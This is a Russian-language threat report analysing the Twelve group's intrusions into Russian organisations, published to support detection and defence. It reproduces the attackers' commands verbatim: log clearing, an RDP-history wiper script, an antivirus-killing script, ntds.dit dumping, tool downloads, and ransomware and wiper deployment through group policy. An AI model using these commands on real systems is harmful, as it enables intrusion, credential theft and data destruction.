ИНФОРМАЦИОННАЯ БЕЗОПАСНОСТЬ

Возвращение группировки -=TWELVE=-

Весной 2024 года в Telegram-канале группировки -=TWELVE=- начали появляться публикации, содержащие персональные данные реальных людей. Вскоре канал был заблокирован за нарушение правил мессенджера. Несколько месяцев о группировке ничего не было слышно, но в ходе исследования атаки, произошедшей в конце июня 2024 года, мы обнаружили техники, полностью идентичные атакам Twelve, а также использование связанных с ней С2-серверов. Поэтому мы уверены, что группировка до сих пор остается активной и, вероятно, скоро вновь заявит о себе в публичном пространстве. В этой статье мы проанализируем действия злоумышленников по методологии Unified ​​Kill Chain.

О группе Twelve

Группировка образовалась на фоне российско-украинского конфликта в апреле 2023 года и с тех пор атакует российские госкомпании.

Злоумышленники специализируются на шифровании и последующем удалении данных жертв, что серьезно затрудняет восстановление информационной среды. Это позволяет сделать вывод, что их основная цель — нанести организации как можно больший ущерб. В своих атаках группа стремится добраться до критической инфраструктуры, однако ей это не всегда удается. Помимо этого, Twelve активно выкачивает конфиденциальную информацию из систем жертв и публикует ее в своем Telegram-канале.

Интересно, что Twelve использует общую инфраструктуру, утилиты и техники (TTP) с вымогательской группой DARKSTAR (ранее называвшейся Shadow и COMET), что свидетельствует об их принадлежности к одному синдикату или кластеру деятельности. При этом, если действия Twelve носят явно хактивистский характер, то DARKSTAR придерживается классической схемы двойного вымогательства. Такое разделение интересов внутри синдиката подчеркивает сложность и разнообразие современных киберугроз.

Unified Kill Chain: In

Фаза «Вход» в контексте Unified Kill Chain относится к начальным этапам кибератаки, направленным на получение доступа к внутренней сети целевой организации. Эти этапы включают в себя ряд тактических действий: от внешней разведки до взятия под контроль систем внутри защищаемой сети.

Reconnaissance

Хотя точные методы разведки, которыми пользуются злоумышленники, не известны наверняка, мы предполагаем, что они сканируют диапазоны IP-адресов по всей России на основе геотегов и пытаются идентифицировать VPN-серверы и приложения, доступные из Интернета, способные стать точками входа в инфраструктуру целевой организации или ее подрядчика.

Resource Development

В ходе анализа кибератак мы выявили, что злоумышленники полагаются исключительно на известные и доступные инструменты. Вот список инструментов, часто используемых этой группой: ngrok, Cobalt Strike, mimikatz, chisel, BloodHound, PowerView, adPEAS, CrackMapExec, Advanced IP Scanner, PsExec.

Initial access и Delivery

В большинстве известных нам атак злоумышленники получали первоначальный доступ к инфраструктуре жертв, используя действительные локальные или доменные учетные записи, VPN- или SSH-сертификаты. Получив доступ к инфраструктуре жертвы, атакующие использовали протокол удаленного рабочего стола (RDP) для горизонтального перемещения.

Чаще всего злоумышленники проникали в инфраструктуру цели через подрядчиков. Для этого они получали доступ к инфраструктуре подрядчика, а затем использовали его сертификат для подключения к VPN клиента. Имея доступ к VPN, злоумышленник может подключиться к системам клиента через протокол удаленного рабочего стола (RDP), а затем переместиться в его инфраструктуру.

Схема атаки через подрядчика

Exploitation

Веб-шеллы

В ходе анализа веб-серверов, скомпрометированных злоумышленниками, мы обнаружили большое количество веб-шеллов. Пути, по которым они находились, выглядели следующим образом:

/home/bitrix/ext_www/[REDACTED]/assets/images/
/home/bitrix/ext_www/[REDACTED]/bitrix/templates/.default/ajax/images/
/home/bitrix/ext_www/[REDACTED]/bitrix/admin/

Все веб-шеллы были написаны на PHP и носили случайные имена:

F6d098f417.php, 3425b29f4e.php, ecb2979be7.php, 04116e895b.php, 7784ba76e2.php, a4daa72a70.php, 5146d22914.php, 001d7a.php, 8759c7.php, 48a08b.php, 6f99ac.php, 82f5f4.php, 0dd37d.php, 6bceb2.php, d0af43.php

Их задачи могли различаться: одни позволяли выполнять произвольные команды, другие — перемещать файлы, третьи — создавать и отправлять электронные письма. Ниже приведены два примера однострочных веб-шеллов, которые позволяют перемещать файлы.

Примеры веб-шеллов для перемещения файлов

Стоит отметить, что большинство веб-шеллов, использованных злоумышленниками, — это общедоступные инструменты, которые можно найти в открытых источниках, например:

• https://github[.]com/stefanpejcic/wordpress-malware;
• https://github[.]com/tennc/webshell/blob/master/php/wso/wso2.php.

Разберем работу веб-шеллов подробнее на примере скрипта для отправки электронных писем (ремейлера).

Пример скрипта-ремейлера, который использовали злоумышленники

Этот PHP-скрипт злоумышленники использовали для отправки электронных писем. В первую очередь он проверяет наличие таких необходимых данных, как адрес получателя, тема и тело сообщения в теле POST-запроса. Если что-либо из ключевых данных отсутствует, скрипт сообщает об ошибке и завершает работу. После успешной проверки и подготовки компонентов электронной почты он использует функцию PHP mail() для отправки электронного письма.

Бэкдор FaceFish

Также в одном из инцидентов мы обнаружили бэкдор FaceFish, который был загружен с помощью веб-шелла, установленного на сервер VMware vCenter в результате эксплуатации уязвимостей CVE-2021-21972 и CVE-2021-22005 в платформе виртуализации vSphere. Первая уязвимость содержится в клиентской части платформы и позволяет удаленно выполнять код, а вторая представляет собой уязвимость загрузки произвольного файла в серверной части.

Как и большинство веб-шеллов, которые использовала группа, этот веб-шелл есть в открытом доступе:

https://github[.]com/NS-Sp4ce/CVE-2021-21972/tree/main/payload/Linux

В зараженной системе он находился по следующему пути:

/usr/lib/vmware-vsphere-ui/server/static/resources/libs/shell.jsp

Бэкдор FaceFish после запуска сохраняет в системе библиотеку (shared library) libs.so, внедряет ее в процесс sshd с помощью метода ld.so.preload и перезапускает сервис SSH.

Пример работы бэкдора FaceFish

Persistence

Чтобы закрепиться в инфраструктуре домена, злоумышленники использовали PowerShell для добавления доменных пользователей и групп, а также для изменения списков ACL (Access Control List) для объектов Active Directory. Ниже приведен список команд, которые они выполняли в PowerShell:

Add-DomainGroupMember -Identity [REDACTED] -Members 'EXCHANGE WINDOWS PERMISSIONS'
Add-DomainGroupMember -Identity [REDACTED] -Members 'Organization Management'
Add-DomainGroupMember -Identity [REDACTED] -Members "EXCHANGE WINDOWS PERMISSIONS"
Add-DomainObjectAcl -Rights 'All' -TargetIdentity "users" -PrincipalIdentity "engineers"
Add-DomainObjectAcl -Rights 'All' -TargetIdentity "dc1" -PrincipalIdentity "users"
Add-DomainObjectAcl -Rights 'All' -TargetIdentity "dc1" -PrincipalIdentity "userasdasdasds"
Set-DomainObject -Credential $Cred -Identity [REDACTED]-SET @{serviceprincipalname='nonexistent/BLAHBLAH'}

Злоумышленники также добавляли доменные учетные записи и группы пользователей с помощью системной утилиты net.exe:

net user [REDACTED] engineers /domain /add
net group [REDACTED] engineers /domain /add
net group engineers [REDACTED] /domain /add
net group engineers 'EXCHANGE WINDOWS PERMISSIONS' /add /domain
net group 'engineers' 'EXCHANGE WINDOWS PERMISSIONS' /add /domain
net group engineers /domain
net group users /domain
net group "Администраторы Домена" [REDACTED] /add /domain

Помимо этого, они пытались распространять и запускать вредоносное ПО через планировщик задач и изменяли групповые политики так, чтобы вредоносные задачи сохранились для всего домена.

Defense Evasion

Чтобы избежать обнаружения, атакующие маскировали свои вредоносные программы и задачи под названия существующих продуктов или сервисов:

C:\Windows\System32\Tasks\run
C:\Windows\System32\Tasks\Update Microsoft
C:\Windows\System32\Tasks\Yandex
C:\Windows\System32\Tasks\YandexUpdate
C:\Windows\SYSVOL_DFSR\domain\scripts\intel.exe

Также злоумышленники применяли набор техник для сокрытия следов своей деятельности. В частности, они очищали журналы событий с помощью системной утилиты wevtutil.exe в различных вариациях командной оболочки.

powershell -command wevtutil el | Foreach-Object {Write-Host Clearing $_; wevtutil cl $_}

C:\Windows\system32\cmd.EXE" /c for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1

Кроме того, атакующие удаляли следы использования RDP с помощью скрипта, очищающего историю подключений RDP, а также последние документы и список выполнения.

@echo off
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f
reg add "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers"
attrib -s -h %userprofile%\documents\Default.rdp
del %userprofile%\documents\Default.rdp
del /f /s /q /a %AppData%\Microsoft\Windows\Recent\AutomaticDestinations
reg delete "HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Explorer/RunMRU" /va /f

Command and Control

В одной из атак группы мы обнаружили использование фреймворка Cobalt Strike, с помощью которого злоумышленники связывались с C2 и распространяли вредоносные полезные нагрузки. Инструмент был обнаружен по следующему пути:

\users\{username}\pictures\photos_delo\loop.exe

Злоумышленники также использовали системные утилиты curl и wget для доставки различных инструментов на скомпрометированные хосты:

wget https://github[.]com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
curl https://github[.]com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1

Unified Kill Chain: Through

Фаза «Через» в контексте Unified Cyber ​​Kill Chain относится к действиям злоумышленника в уже скомпрометированной сети цели для получения доступа к дополнительным системам и данным, которые необходимы для достижения конечных целей атаки. Этот этап включает в себя ряд действий, направленных на распространение по сети и получение доступа к критически важным ресурсам.

Pivoting

Злоумышленники использовали утилиту ngrok для туннелирования трафика. Они устанавливали ее сразу после подключения к системе и прописывали в файле конфигурации порт 3389 (стандартный порт RDP). После этого все нелегитимные подключения к системе по RDP происходили через эту утилиту. Злоумышленники прикрепляли ngrok к службе под названием svchost при помощи следующей команды:

C:\ProgramData\svchost\svchost.exe service run --config
C:\ProgramData\svchost\svchost.yml

Каталог C:\ProgramData\svchost\ создан злоумышленниками. Файл svchost.exe — это собственно утилита ngrok, а svchost.yml служит ее файлом конфигурации. Помимо номера порта в нем указан токен авторизации, который выглядит следующим образом: 2YXVHSiK9hhc4aKCbH4i6BLh21J_6zwxt**********. У разных образцов токены разные.

Схема использования утилиты ngrok

На то, что соединения злоумышленников были инициированы через ngrok, указывает значение «::::%16777216» в поле «Адрес исходной сети» журнала событий RDP.

Discovery

В контексте разведки внутренней сети и доменной инфраструктуры, а также исследования отношений между доменами злоумышленники использовали такие инструменты, как Advanced IP Scanner, BloodHound и adPEAS. Advanced IP Scanner позволяет быстро идентифицировать все устройства в сети. BloodHound используется для анализа и визуализации того, каким пользователям и системам домен доверяет, а также определения путей наименьшего сопротивления для повышения привилегий. adPEAS применяется для атак на Active Directory, выявления недостатков в конфигурации и путей повышения привилегий в домене. В совокупности эти инструменты позволяют злоумышленникам эффективно исследовать и эксплуатировать внутренние сети жертв.

Помимо этого, группа использовала командлеты модуля PowerView для обнаружения учетных записей пользователей домена:

Get-DomainObject users
Get-ADUsers users
Get-ADUser users
Get-ADUser -Filter * -SearchBase "[REDACTED OU]"
Get-ADUser -Filter * -SearchBase "[REDACTED OU]" | findstr Name

Информацию о группах домена группа получала при помощи PowerShell.

Get-ADGroup
Get-ADGroup "EXCHANGE WINDOWS PERMISSIONS"
Get-ADGroupMember "EXCHANGE WINDOWS PERMISSIONS"
Get-ADGroupMember "engineers"
Get-DomainGroupMember engineers
Get-DomainGroupMember skzi

Privilege Escalation

Для повышения привилегий злоумышленники в основном использовали легитимные учетные данные пользователей, имеющих административный доступ.

Помимо этого, они изменяли атрибуты новых учетных записей, которые создавали для достижения своих целей, при помощи модуля PowerView:

Add-DomainObjectAcl -Rights 'All'

Параметр -Rights ‘All’ предоставляет учетной записи полный доступ к указанному объекту. Он может включать права на чтение, запись, создание, удаление и выполнение различных операций с объектом.

Пример прав, предоставленных интересующей злоумышленников учетной записи при помощи PowerView

Execution

Скрипты и команды

Злоумышленники использовали системные интерпретаторы и общедоступные инструменты, а также самописные скрипты .bat и PowerShell для выполнения различных действий в системе.

Примеры найденных скриптов атакующих:

gpo.ps1
Sophos_kill_local.ps1
Logon.bat
CleanRDPHistory.bat
c:\intel\GPO.bat
\\netlogon\logon.bat
c:\intel\test.ps1
\\netlogon\u.bat
\SYSVOL\domain\scripts\outlookconf2003.ps1

Список выполненных злоумышленниками команд в журнале PowerShell указывает, что они имели активные сессии PowerShell на атакованных хостах, а также позволяет оценить технический уровень оператора.

Ниже приведен список команд, которые злоумышленники выполняли в попытке импортировать модуль PowerView.

impot .\PowerView.ps1
import .\PowerView.ps1
Import-Module .\PowerView.ps1
cd C:\Users\Public\Documents
Import-Module .\PowerView.ps1
Set-ExecutionPolicy bypass
Import-Module .\PowerView.ps1

Sophos_kill_local.ps1

Один из обнаруженных скриптов пытается завершить процессы Sophos на компьютере и записывает результаты в локальные и удаленные файлы журналов.

$LogTime = Get-Date -Format "MM-dd-yyyy_hh-mm-ss"
$path = "C:\Program Files (x86)\Sophos\Logs\"
$pcname = $env:computername
$Processes = Get-WmiObject -Class Win32_Process -ComputerName $env:computername -Filter "ExecutablePath LIKE '%Sophos%'"
foreach ($process in $processes) {
$ProcessName = $process.name
$returnval = $process.terminate()
$processid = $process.handle
if($returnval.returnvalue -eq 0) {
$LogFile1 = 'C:\Program Files (x86)\Sophos\Logs\'+$LogTime+"_Success-Terminated"+".txt"
$LogFile11 = '\\[redacted]\NETLOGON\Sophos\Logs\'+$pcname+"_"+$LogTime+"_Success-Terminated"+".txt"
"The process $ProcessName ($processid) has been terminated successfully." | Out-File $LogFile1 -Append -Force
"The process $ProcessName ($processid) has been terminated successfully." | Out-File $LogFile11 -Append -Force
} else {
$LogFile2 = 'C:\Program Files (x86)\Sophos\Logs\'+$LogTime+"_Sophos Not-Terminated"+".txt"
$LogFile22 = '\\[redacted]\NETLOGON\Sophos\Logs\'+$pcname+"_"+$LogTime+"_Sophos Not-Terminated"+".txt"
"The process $ProcessName ($processid) has not been terminated." | Out-File $LogFile2 -Append -Force
"The process $ProcessName ($processid) has not been terminated." | Out-File $LogFile22 -Append -Force
}
}

Использование планировщика задач

Злоумышленники выполняли все итоговые деструктивные действия, такие как запуск шифровальщиков и вайперов, с помощью задач планировщика, которые создавались путем изменения групповых политик. Это позволяло атакующим выполнять их на всех машинах в домене одновременно.

reg:\\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{9042DCD8-1F89-4FC4-8B13-4D3D5F3AED03}:Actions, `cmd.exe` /c c:\programdata\twelve.exe -pass 8d173e097f51f519a36ade287522d520

reg:\\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{AB35C377-2AD2-4609-BB92-824482E67525}:Actions, `cmd.exe` /c \\[DOMAIN]\netlogon\wiper.exe

reg:\\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{A131C020-DD72-428E-BD2A-7DEABAF428D0}:Actions, `powershell.exe` Copy-Item `\\[DOMAIN]\netlogon\wiper.exe` -Destination `C:\ProgramData

reg:\\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{0B177D41-E344-40D4-BDDA-9C6A082CE273}:Actions, `cmd.exe` /c \\[DOMAIN]\netlogon\twelve.exe -pass 8d173e097f51f519a36ade287522d520;

reg:\\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{FB72DE3D-DDA1-4A91-8634-B0523C26BCBF}:Actions, `POWERSHELL.EXE` Copy-Item `\\[DOMAIN]\netlogon\twelve.exe` -Destination `C:\ProgramData`

powershell -ex bypass -f \\[DOMAIN]\netlogon\outlookconf2003.ps1

\\[DOMAIN]\netlogon\12.exe -pass f589507391bc21266c3a8528ae7566f7

C:\ProgramData\intel.exe

Credential Access

Чтобы получить учетные данные пользователя, злоумышленники использовали mimikatz. Файл утилиты они сохраняли под именем calculator.exe, чтобы замаскировать ее настоящее назначение. При этом они поленились поменять стандартную иконку утилиты. С помощью mimikatz атакующие создавали дамп локальных учетных данных из памяти процесса lsass.exe.

Скриншот запущенного исполняемого файла calculator.exe

Мы обнаружили на скомпрометированных хостах артефакты использования утилиты mimikatz как в виде исполняемого файла, так и в виде PowerShell-скрипта.

C:\Users\[User]\Desktop\x64\mimikatz.exe
C:\Users\[User]\Desktop\CrackMapExecWin_v2.2\hosted\Invoke-Mimikatz.ps1
C:\[Redacted]\x64\mimidrv.sys

Помимо дампа lsass.exe посредством mimikatz, для получения локальных учетных данных злоумышленники делали дампы веток реестра SYSTEM, SAM и SECURITY с помощью системной утилиты reg.exe и сохраняли их в папке Downloads для дальнейшего архивирования и эксфильтрации.

C:\Users\[USER]\Downloads\SYSTEM
C:\Users\[USER]\Downloads\SAM
C:\Users\[USER]\Downloads\SECURITY

Злоумышленники также пытались получить доступ к учетным данным домена. Для этого они делали дамп ntds.dit с помощью системной утилиты ntdsutil.exe.

Команда, создающая дамп ntds.dit, выглядит следующим образом:

$system32\ntdsutil.exe",""$system32\ntdsutil.exe" "ac i ntds" ifm "create full c:\temp" q q

После этого, чтобы получить дополнительные учетные данные из системы, атакующие использовали консольную версию утилиты All-In-One Password Recovery Pro от XenArmor, которая может извлечь большую часть учетных данных пользователя из кустов реестра.

Команда для сбора данных при помощи All-In-One Password Recovery Pro выглядит следующим образом:

c:\programdata\update\xenallpasswordpro.exe"  -a "c:\programdata\update\report.html"

На скриншоте ниже можно увидеть пример выполнения этой утилиты с параметрами, которые использовали атакующие, и перечень данных, которые она собирает при такой конфигурации.

Lateral Movement

Для перемещения внутри инфраструктуры жертвы злоумышленники использовали локальные и доменные учетные данные, полученные на предыдущих этапах атаки.

Чаще всего они подключались к новым устройствам в сети жертвы по протоколу удаленного рабочего стола (RDP) через исполняемый файл mstsc.exe. В некоторых случаях они также использовали PsExec для перемещения по сети с помощью протокола SMB и команду Enter-PSSession для установления интерактивного сеанса с удаленными компьютерами в сети, которая является частью возможностей PowerShell по управлению удаленными системами и выполнению в них команд с помощью PowerShell Remoting.

Enter-PSSession -ComputerName [COMPUTER 1]
Enter-PSSession -ComputerName [COMPUTER 2]
Enter-PSSession -ComputerName [COMPUTER 3]

Команда Enter-PSSession создает временный интерактивный сеанс между локальной и удаленной системами, позволяя злоумышленникам выполнять команды PowerShell непосредственно на удаленных машинах, как если бы они выполнялись локально. Для связи обычно используется протокол WS-Management, работающий поверх HTTP или HTTPS.

Unified Kill Chain: Out

Фаза «Выход» в контексте Unified ​​Kill Chain описывает заключительные действия злоумышленника после успешного проникновения в целевую сеть и получения доступа ко всем необходимым системам и данным. На этом этапе основное внимание уделяется достижению конечных целей атаки, которые могут включать кражу данных, саботаж или другие действия, ставящие под угрозу конфиденциальность, целостность и доступность (CIA) информационных активов жертвы.

Collection

Злоумышленники собирали много конфиденциальной информации о своих жертвах: финансовые документы, чертежи, корпоративную переписку и т. д. Собранные данные они архивировали с помощью утилиты 7z и пересылали через облачные службы обмена.

Также во время своих атак злоумышленники архивировали и эксфильтровали папку tdata с данными мессенджера Telegram.

C:\Users\[User]\AppData\Roaming\Telegram Desktop\tdata\tdata.7z

В этой папке находятся кэшированные медиафайлы (изображения, видео, аудио), сообщения, стикеры и документы, которые пользователь отправлял или получал через Telegram. Эти данные можно использовать для быстрого доступа без необходимости повторной загрузки файлов с серверов. Также папка tdata содержит сеансовые файлы, которые позволяют приложению автоматически подключаться к учетной записи без повторного ввода имени пользователя и пароля.

Злоумышленник, получивший доступ к этой папке, может извлечь личные сообщения, медиафайлы и документы, что приведет к утечке личной или коммерческой конфиденциальной информации. Сеансовые файлы и ключи шифрования он может использовать для доступа к учетной записи Telegram без авторизации, а также для чтения переписки и отправки сообщений от имени жертвы.

Exfiltration

Архивы с интересующими их данными злоумышленники загружали на ресурс обмена данными https://dropmefiles.net/ через браузер. На использование этого сервиса указывает обнаруженный нами артефакт: во время исследования одной из атак в кеше браузера был сохранен заголовок страницы «Завантаження вдалося! — dropmefiles.net» (перевод: «Загрузка удалась! — dropmefiles.net«).

Схема эксфильтрации данных

Impact

Шифровальщики

Злоумышленники шифровали данные с помощью версии популярного шифровальщика LockBit 3.0, скомпилированной из появившегося в открытом доступе исходного кода.

Атрибуция Kaspersky Threat Attribution Engine

Мы обнаруживали файлы шифровальщика по следующим путям:

• \ProgramData\
• \\netlogon\

Следующие имена файлов фигурировали в известных нам инцидентах с шифровальщиком на базе LockBit 3.0:

• twelve.exe
• 1.exe
• 12.exe
• enc.exe
• betta.exe
• sed.exe
• svo.exe

Ниже представлен граф детонации для этого шифровальщика, построенный инструментом  Kaspersky Cloud Sandbox. Он отображает процесс выполнения файла и возникающие в ходе этого процесса подозрительные события. Как можно видеть на графе, шифровальщик ведет себя довольно шумно и генерирует много событий, по которым можно обнаружить его активность.

Граф детонации шифровальщика, использованного Twelve

Как мы уже упоминали в разделе Execution, шифровальщик распространяется в инфраструктуре жертвы с помощью групповых политик. Атакующие использовали PowerShell, чтобы переместить файл шифровальщика в сетевую папку netlogon, после чего запускали скрипт для изменения групповых политик.

powershell.exe -ex bypass -f C:\Users\Public\gpo.ps1

После обновления политик на всех компьютерах в домене создавались запланированные задачи, отвечающие за копирование и выполнение шифровальщика.

Сначала шифровальщик перемещался из сетевой папки netlogon в локальную директорию ProgramData при помощи задачи Copywiper.

powershell.exe Copy-Item `\\[DOMAIN]\netlogon\twelve.exe` -Destination `C:\ProgramData`

После этого происходил запуск шифровальщика (из локальной или сетевой папки) с помощью командной строки с указанием уникального пароля в качестве аргумента -pass.

cmd.exe` /c c:\programdata\twelve.exe -pass ************

Схема действий злоумышленников

Алгоритм работы программы-вымогателя зависит от встроенного файла конфигурации. В таблице ниже представлена ​​конфигурация анализируемого троянца (для всех найденных образцов она одинакова):

В файле конфигурации также указан список каталогов, в которых файлы не шифруются.

Кроме того, в нем содержится список конкретных файлов, не подлежащих шифрованию.

Наконец, программа-вымогатель не шифрует файлы со следующими расширениями:

Перед началом работы шифровальщик завершает процессы, которые могут мешать шифрованию отдельных файлов. Ниже представлен список имен процессов, которые подлежат завершению.

Также шифровальщик завершает следующие службы:

Интересно, что в конфигурации, отвечающей за создание записки о выкупе, отсутствуют какие-либо реквизиты или способы связи со злоумышленниками. Итоговая записка состоит из одного логотипа группировки.

Записка Twelve

Также мы обнаружили, что в некоторых случаях злоумышленники использовали для шифрования файлов троянца, созданного с помощью слитого билдера шифровальщика Chaos. Образцы этого шифровальщика были обнаружены по следующим путям:

c:\netlogon\enc.exe
c:\Users\User\enc.exe
c:\Windows\System32\config\systemprofile\appdata\roaming\twelve.exe
c:\Windows\sysvol\domain\scripts\enc.exe

Как можно видеть на скриншоте ниже, Kaspersky Threat Attribution Engine определяет шестидесятипроцентное сходство одного из этих образцов с шифровальщиком Chaos.

Результат атрибуции файла при помощи Kaspersky Threat Attribution Engine

На момент обнаружения образцов не было ясно, кто стоит за инцидентами, в которых они задействовались. Однако статический анализ показал, что в коде содержатся характерные строки, указывающие на связь образцов с группой Twelve.

Результат статического анализа шифровальщика на базе Chaos

Вайперы

Помимо шифровальщиков, злоумышленники использовали вайперы для уничтожения инфраструктуры жертв. Как правило, вайперы запускались после шифрования файлов.

Найденный нами файл вайпера скомпилирован из исходного кода, находящегося в открытом доступе. В процессе своей работы он перезаписывает загрузочную область (MBR) на подключенных дисках так, что при следующем включении устройства на экране появляется строка From Iran with love. — Shamoon, а операционная система не загружается.

Строка, которая записывается в MBR

Затем файл рекурсивно проходит по всем каталогам (кроме папок Windows и «Информация о системном томе») на всех подключенных дисках и для каждого файла:

• перезаписывает содержимое файла случайно сгенерированными байтами;
• перезаписывает метаданные файла: сбрасывает размер, устанавливает

случайные даты создания/изменения/доступа;

• присваивает файлу случайное имя и удаляет его.

По окончании своей работы вредоносный файл удаляет себя и завершает работу системы.

В процессе динамического и статического анализа мы пришли к выводу, что найденная версия вайпера ничем не отличается от версии, находящейся в открытом доступе.

Граф детонации вайпера в Kaspersky Cloud SandBox

Результат статического анализа вайпера

Также при исследовании атак группировки Twelve мы обнаружили еще одну версию вайпера. Образец ничем не отличается от вайпера Shamoon, кроме ряда специфически переименованных функций.

Переименованные функции вайпера на базе Shamoon

При исследовании атак группировки мы видели файлы вайперов по следующим путям:

• \Desktop\
• \ProgramData\
• \\netlogon\

Следующие имена файлов фигурировали в известных нам инцидентах с указанным вайпером:

• intel.exe
• mail.exe
• wiper.exe

Схема распространения вайперов в инфраструктуре жертвы почти не отличается от распространения шифровальщиков. С помощью PowerShell злоумышленники копируют файл вайпера в сетевую папку netlogon, после чего запускают скрипт, который изменяет групповые политики и создает запланированные задачи.

powershell -ex bypass -f \\[DOMAIN]\netlogon\outlookconf2003.ps1

Затем происходит копирование файла вайпера из сетевой папки netlogon в локальную папку ProgramData на все уже зашифрованные компьютеры в домене.

powershell.exe` Copy-Item `\\[DOMAIN]\netlogon\intel.exe` -Destination `C:\ProgramData

После этого стартует запланированная задача, запускающая файл вайпера, который уничтожает информацию на устройстве.

C:\ProgramData\intel.exe

Схема распространения вайпера в инфраструктуре жертвы

Objectives

Стратегические цели атакующих:

• Разрушение критической инфраструктуры и нарушение деятельности предприятий.
• Кража конфиденциальных данных жертв.
• Дискриминация жертв путем сообщения об их взломе в Telegram-канале злоумышленников.

Выводы

Основной мотив группы Twelve — не финансовая выгода, а хактивизм. Это проявляется в методах их работы: вместо того, чтобы требовать выкуп за расшифровку данных, Twelve предпочитает шифровать информацию жертв, а затем разрушать инфраструктуру с помощью вайпера, делая невозможным восстановление данных. Такой подход указывает на стремление нанести максимальный ущерб целевым организациям, не получая при этом прямой материальной выгоды.

Анализ также показал, что группа применяет исключительно общедоступный и хорошо знакомый арсенал различного вредоносного ПО, что означает отсутствие у злоумышленников собственных разработок в этой области. Как следствие, атаки Twelve можно своевременно обнаружить и предотвратить. Однако если этого не сделать, злоумышленники могут нанести значительный ущерб инфраструктуре организации.

Индикаторы компрометации

Web-Shells
05d80c987737e509ba8e6c086df95f7d
48b2e5c49f121d257b35ba599a6cd350
5dcd02bda663342b5ddea2187190c425
97aac7a2f0d2f4bdfcb0e8827a111524
dad076c784d9fcbc506c1e614aa27f1c
ecb14e506727ee67220e87ced2e6781a
f8da1f02aa64e844770e447709cdf679

Mimikatz
e930b05efe23891d19bc354a4209be3e

Scripts
7a7c0a521b7596318c7cd86582937d98
72830102884c5ebccf2afbd8d9a9ed5d
31014add3cb96eee557964784bcf8fde 
7dfa50490afe4553fa6889bdafda7da2

Ngrok
43b3520d69dea9b0a27cce43c1608cad

Cobalt Strike
7bec3c59d412f6f394a290f95975e21f

Ransomware
9c74401a28bd71a87cdf5c17ad1dffa5       twelve.exe
d813f5d37ab2feed9d6a2b7d4d5b0461       12.exe
646a228c774409c285c256a8faa49bde       enc.exe
5c46f361090620bfdcac6afce1150fae       twelve.exe
9bd78bcf75b9011f9d7a9a6e5aee5bf6       twelve.exe
f90e95b9fcab4c1b08ca06bc2c2d6e40       12.exe
39b91f5dfbbec13a3ec7cce670cf69ad       sed.exe/1.exe/Screen2.exe/SVO.exe/BETTA.EXE  

Wiper
4bff90a6f7bafc8e719e8cab87ab1766       intel.exe/mail.exe

File paths
C:\ProgramData\sed.exe
C:\Users\{username}\Downloads\sed.exe
C:\Users\{username}\Desktop\sed.exe
C:\programdata\svchost\svchost.exe
C:\programdata\svchost\svchost.yml
C:\Users\{username}\AppData\Local\CEF\User Data\Dictionaries\svchost.exe
C:\Users\{username}\AppData\Local\CEF\User Data\Dictionaries\svchost.yml
C:\Users\{username}\Desktop\svchost.exe
C:\Users\{username}\Desktop\svchost.yml
C:\users\{username}\pictures\photos_delo\loop.exe
C:\users\{username}\downloads\chisel_1.9.1_windows_amd64\chisel.exe
C:\Users\{username}\Documents\PowerView.ps1
C:\Users\{username}\Documents\calculator.exe
C:\Windows\qbkLIdag.exe
C:\Windows\System32\Tasks\run
C:\Windows\System32\Tasks\Update Microsoft
C:\Windows\System32\Tasks\Yandex
C:\Windows\System32\Tasks\YandexUpdate
C:\Windows\SYSVOL\domain\scripts\intel.exe
C:\Windows\SYSVOL\domain\scripts\outlookconf2003.ps1
C:\Windows\SYSVOL\domain\scripts\ZZZZZZ
C:\Windows\SYSVOL_DFSR\domain\scripts\intel.exe
\\[DOMAIN]\netlogon\12.exe
\\[DOMAIN]\netlogon\outlookconf2003.ps1
\\[DOMAIN]\netlogon\intel.exe
C:\123\12.exe
C:\ProgramData\intel.exe
C:\Users\Public\46a2209036e6282c45f8dfd3f046033d.ps1
C:\Users\Public\gpo.ps1
C:\Windows\Logs\PsExec.exe

Domains and IPs
212.109[.]217.88
195.2[.]79.195
109.205[.]56.229
193.110[.]79.47
195.2[.]79.195
217.148[.]143.196
5.8[.]16.147
5.8[.]16.148
5.8[.]16.149
5.8[.]16.169
5.8[.]16.170
5.8[.]16.236
5.8[.]16.238
79.137[.]69.34
85.204[.]124.94
89.238[.]132.68
89.33[.]8.198
91.90[.]121.220

Следите за киберугрозами вместе с экспертами CRATU!
Анализ реальных атак, техники APT-групп, новые уязвимости, практические рекомендации по детекту и доля иронии — всё, как вы любите.

CRATU — ваш инсайдерский источник по кибербезопасности. Подписывайтесь на наш Telegram-канал